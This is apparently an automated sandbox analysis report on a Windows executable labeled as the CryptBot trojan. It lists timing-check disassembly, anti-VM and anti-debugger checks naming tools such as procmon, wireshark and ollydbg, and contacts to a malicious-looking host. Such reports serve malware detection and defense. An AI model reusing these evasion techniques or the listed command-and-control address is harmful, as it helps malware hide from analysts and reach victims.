Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E509FB second address: 6E50AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 640365B2h 0x00000008 pushfd 0x00000009 jmp 00007F9D00F1DB63h 0x0000000e xor ah, FFFFFFAEh 0x00000011 jmp 00007F9D00F1DB69h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F9D00F1DB67h 0x00000022 and ah, FFFFFFBEh 0x00000025 jmp 00007F9D00F1DB69h 0x0000002a popfd 0x0000002b mov bl, cl 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F9D00F1DB64h 0x00000038 and cx, 55E8h 0x0000003d jmp 00007F9D00F1DB5Bh 0x00000042 popfd 0x00000043 jmp 00007F9D00F1DB68h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50AB4 second address: 6E50ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50ABA second address: 6E50ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50ABE second address: 6E50AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9D01181AB8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50AEF second address: 6E50AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50AFE second address: 6E50B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50B04 second address: 6E50B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50B08 second address: 6E50B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50B0C second address: 6E50B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b pushad 0x0000000c jmp 00007F9D00F1DB5Dh 0x00000011 jmp 00007F9D00F1DB60h 0x00000016 popad 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F9D00F1DB5Dh 0x00000023 adc ecx, 35C0E6D6h 0x00000029 jmp 00007F9D00F1DB61h 0x0000002e popfd 0x0000002f mov ebx, esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6E50B65 second address: 6E50B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0A26 second address: 6EC0A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3FAAE8B2h 0x00000008 mov ax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov edi, esi 0x00000012 mov ax, 6FF3h 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F9D00F1DB66h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9D00F1DB5Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0A66 second address: 6EC0A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0A75 second address: 6EC0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D00F1DB5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0AA4 second address: 6EC0B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d mov si, 0F83h 0x00000011 pushfd 0x00000012 jmp 00007F9D01181AB8h 0x00000017 sub ecx, 1D79C348h 0x0000001d jmp 00007F9D01181AABh 0x00000022 popfd 0x00000023 popad 0x00000024 and dl, 00000007h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F9D01181AABh 0x00000030 add si, C58Eh 0x00000035 jmp 00007F9D01181AB9h 0x0000003a popfd 0x0000003b mov ah, 28h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0B21 second address: 6EC0B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D00F1DB67h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0B4A second address: 6EC0B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | RDTSC instruction interceptor: First address: 6EC0B50 second address: 6EC0B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0B54 second address: 6EC0BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9D711B713Ch 0x0000000e jmp 00007F9D01181AB7h 0x00000013 sub ecx, ecx 0x00000015 pushad 0x00000016 jmp 00007F9D01181AB5h 0x0000001b mov eax, 39B03A37h 0x00000020 popad 0x00000021 inc ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F9D01181AB9h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0BB3 second address: 6EC0BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0BB9 second address: 6EC0BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F1D second address: 6EA0F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F21 second address: 6EA0F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F27 second address: 6EA0F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F2D second address: 6EA0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB04C5 second address: 6EB054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D00F1DB67h 0x00000009 adc ax, C7EEh 0x0000000e jmp 00007F9D00F1DB69h 0x00000013 popfd 0x00000014 mov dl, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F9D00F1DB66h 0x00000020 pushfd 0x00000021 jmp 00007F9D00F1DB62h 0x00000026 sub si, 69C8h 0x0000002b jmp 00007F9D00F1DB5Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp], ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB054A second address: 6EB0565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0565 second address: 6EB05A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov eax, 516913A3h 0x00000011 mov ah, 46h 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F9D00F1DB5Dh 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB05A2 second address: 6EB05A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB05A8 second address: 6EB05EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F9D00F1DB62h 0x00000010 xchg eax, esi 0x00000011 jmp 00007F9D00F1DB60h 0x00000016 push eax 0x00000017 jmp 00007F9D00F1DB5Bh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bx, 84F2h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB05EB second address: 6EB0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F9D01181AB0h 0x00000011 sub ecx, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ah, 5Fh 0x00000018 jmp 00007F9D01181AAFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0631 second address: 6EB06F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D00F1DB5Fh 0x00000009 jmp 00007F9D00F1DB63h 0x0000000e popfd 0x0000000f mov ecx, 2409523Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F9D00F1DB60h 0x0000001f sub si, 3F28h 0x00000024 jmp 00007F9D00F1DB5Bh 0x00000029 popfd 0x0000002a call 00007F9D00F1DB68h 0x0000002f mov bh, ah 0x00000031 pop edx 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007F9D00F1DB5Dh 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov di, si 0x0000003e pushfd 0x0000003f jmp 00007F9D00F1DB68h 0x00000044 and ah, 00000018h 0x00000047 jmp 00007F9D00F1DB5Bh 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, 00000001h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jmp 00007F9D00F1DB5Bh 0x0000005b mov dx, si 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB06F3 second address: 6EB0726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d jmp 00007F9D01181AAEh 0x00000012 mov ecx, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0726 second address: 6EB0743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0743 second address: 6EB07B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D01181AB7h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp ecx, 01h 0x0000000e pushad 0x0000000f mov bx, 94D6h 0x00000013 pushfd 0x00000014 jmp 00007F9D01181AB7h 0x00000019 xor eax, 33A9595Eh 0x0000001f jmp 00007F9D01181AB9h 0x00000024 popfd 0x00000025 popad 0x00000026 jne 00007F9D711A38D3h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, 4060DEBEh 0x00000034 mov dl, 28h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB07B2 second address: 6EB07B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB07B8 second address: 6EB0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9D01181AB4h 0x00000013 or si, 26E8h 0x00000018 jmp 00007F9D01181AABh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F9D01181AB8h 0x00000024 sbb cx, 3948h 0x00000029 jmp 00007F9D01181AABh 0x0000002e popfd 0x0000002f popad 0x00000030 pop esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F9D01181AB0h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0839 second address: 6EB083F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E7038B second address: 6E70391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E70391 second address: 6E70397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Special instruction interceptor: First address: 1421877 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Special instruction interceptor: First address: 15BCC34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Special instruction interceptor: First address: 15BC8F3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Special instruction interceptor: First address: 15E953A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Special instruction interceptor: First address: 164B447 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00F29980 rdtsc 0_2_00F29980
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe TID: 2500 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D4255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D4255D
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D429FF
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D4255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D4255D
Source: QMtCX5RLOP.exe, QMtCX5RLOP.exe, 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: QMtCX5RLOP.exe, 00000000.00000003.1810161385.000000000088E000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828788277.000000000088F000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000003.1809498522.0000000000880000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000003.1809683867.0000000000883000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000003.1809473978.0000000000873000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfN
Source: QMtCX5RLOP.exe | Binary or memory string: Hyper-V RAW
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: QMtCX5RLOP.exe, 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: QMtCX5RLOP.exe, 00000000.00000003.1728801712.0000000000824000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File opened: NTICE
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File opened: SICE
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00F29980 rdtsc 0_2_00F29980
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D41160 SetUnhandledExceptionFilter,0_2_00D41160
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D411A3 SetUnhandledExceptionFilter,0_2_00D411A3
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D413C9 SetUnhandledExceptionFilter,0_2_00D413C9
Source: QMtCX5RLOP.exe, QMtCX5RLOP.exe, 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: U%Program Manager
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 81.29.149.125:80
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 81.29.149.125:80
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count shown against that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 24 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 24 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label | Link
QMtCX5RLOP.exe | 46% | Virustotal | |
QMtCX5RLOP.exe | 58% | ReversingLabs | Win32.Trojan.CryptBot |
QMtCX5RLOP.exe | 100% | Avira | TR/Crypt.TPM.Gen |
QMtCX5RLOP.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 81.29.149.125 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | QMtCX5RLOP.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | QMtCX5RLOP.exe, 00000000.00000002.1828476400.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
